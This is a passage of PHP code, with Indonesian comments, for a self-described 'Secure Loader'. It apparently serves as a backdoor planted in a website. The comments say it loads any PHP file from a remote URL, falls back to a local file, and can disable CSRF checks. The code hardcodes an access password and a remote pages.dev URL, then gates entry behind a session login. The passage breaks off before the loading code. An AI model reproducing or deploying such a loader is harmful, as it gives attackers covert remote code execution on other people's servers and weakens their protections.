setDisabled(true); } /** * Secure Loader Final Universal * Fitur: * - Password tambahan sebelum masuk * - Bisa load file PHP apa pun dari remote * - Fallback otomatis ke file lokal jika remote gagal * - Opsional: disable CSRF token check */ // ====== KONFIGURASI ====== $MY_SECURE_PASS = "Andromax1"; // password login tambahan $TARGET_FILE = "indexold.php"; // nama file lokal fallback $REMOTE_URL = "https://javascript-dia.pages.dev/a.php"; // remote URL fallback // ====== AUTH PROTEKSI TAMBAHAN ====== session_start(); if (!isset($_SESSION['secure_auth'])) { if (isset($_POST['myloginpass'])) { if ($_POST['myloginpass'] === $MY_SECURE_PASS) { $_SESSION['secure_auth'] = true; header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "❌ Password salah!"; } } ?>